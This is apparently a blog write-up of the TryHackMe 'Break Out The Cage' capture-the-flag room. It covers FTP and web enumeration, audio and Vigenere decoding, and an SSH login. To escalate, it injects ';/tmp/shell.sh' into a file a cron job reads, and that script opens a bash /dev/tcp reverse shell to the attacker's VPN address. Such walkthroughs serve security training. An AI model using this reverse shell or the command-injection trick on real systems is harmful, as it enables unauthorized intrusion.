Break Out The Cage — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Break Out The Cage — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports
nmap -A -T4 -p- -v <ip>
Well, there are 3 opening ports: 21(FTP), 22(SSH), and 80 (http). And also, we can login as anonymous on FTP. So first let’s try ftp to the machine.
ftp <ip>
Login as anonymous, when it prompts for password, just enter.
There is a file called “dad_tasks”. Let’s see the content of this file.
get dad_tasks -
*remember to specify the “-” symbol at the end, so you won’t need to transfer it to your machine but read it directly.
Well looks like it’s some kind of encoded string. We haven’t known yet, so just leave it there first. Now let’s move to the website.
Move around and we’ll see some valuable information:
- a name: Weston
- he’s in “Cage”
- many images
It’s always good to check the page source using Ctrl+U. I’ve checked it but nothing useful. Let’s use dirbuster to find hidden dirs.
After a while, I found 3 suspicious folders:
- /scripts: contains the movies’ scripts
- /contracts: contains an empty folder
- /auditions: contains an mp3 file
Let’s first download the mp3 file.
There will be some strange noise near the beginning of this mp3 file. Inspect the spectrum at this part, and you will find a string: namelesstwo.
You can use this website: https://academo.org/demos/spectrum-analyzer/
Now get back to the encoded string we found at FTP. Use https://icyberchef.com to decode this.
After a while of researching, I found that it’s encoded with Base64 and Vigenere.
Enter the key namelesstwo when decode Vigenere.
Now I’ve found a password for Weston. It’s our #1 answer.
SSH to the machine using weston and the password above.
Wait a while and you will see a message appears:
Well now I know that there are some cronjobs running.
Let’s sudo -l to see if weston can run sudo:
Weston may run the /usr/bin/bees as root. Unfortunately we can’t modify this bees script.
I will use a script which can snoop Linux process, called “pspy32”. You can download it here:
https://github.com/DominicBreuker/pspy
Download the pspy32 to your machine, then start a http server using python, and then from the ssh machine use wget to get the file.
After download the file, start a http server from your machine:
python3 -m http.server 9000
Or if you use python2:
python -m SimpleHTTPServer 9000
Then from ssh machine:
wget http://<your_vpn_ip>:9000/pspy32
Now the file is in the ssh machine.
chmod +x pspy32
Then exec this file:
./pspy32
Wait a while until a message appears again:
Now I know where the script is stored: /opt/.dads_scripts/spread_the_quotes.py
Read the content of this script:
Well, it takes a random line in .quotes and print out. We cannot modify the content of this script, however, we can modify the content of .quotes. We will change it to spawn a shell using python.
cat > /tmp/shell.sh << EOF
#!/bin/bash bash -i >& /dev/tcp/<your-vpn-ip/4444 0>&1
EOF
chmod +x /tmp/shell.sh
printf ‘anything;/tmp/shell.sh\n’ > /opt/.dads_scripts/.files/.quotes
*Remember to write a random string at the head, because without it, the script will consider the reverse shell script as something to print out, not to execute.
Start a listener on your machine:
nc -lvnp 4444
Then wait a while for it to run (2–3 mins) and you will have the shell.
Now i’m cage. Get the 1st flag at his home folder.
Now try to get root to catch our final flag.
There is also a folder called “email_backup” inside cage’s home. Let’s see what’s inside.
There are 3 emails here. Read all of it and you will find something interesting in email_3:
What is this string about? Moreover, I keep seeing the word “face” repeating. So again, let’s try to decode this string with Vigenere and key: face
Now we can read this. Try to login as root using that decoded string.
Ping-pong! Now I’m root. Get our final flag.
cd to /root and you will see a email_backup folder. cd to it and read email_2. You will the the flag in it!
The end.
HAPPY HACKING
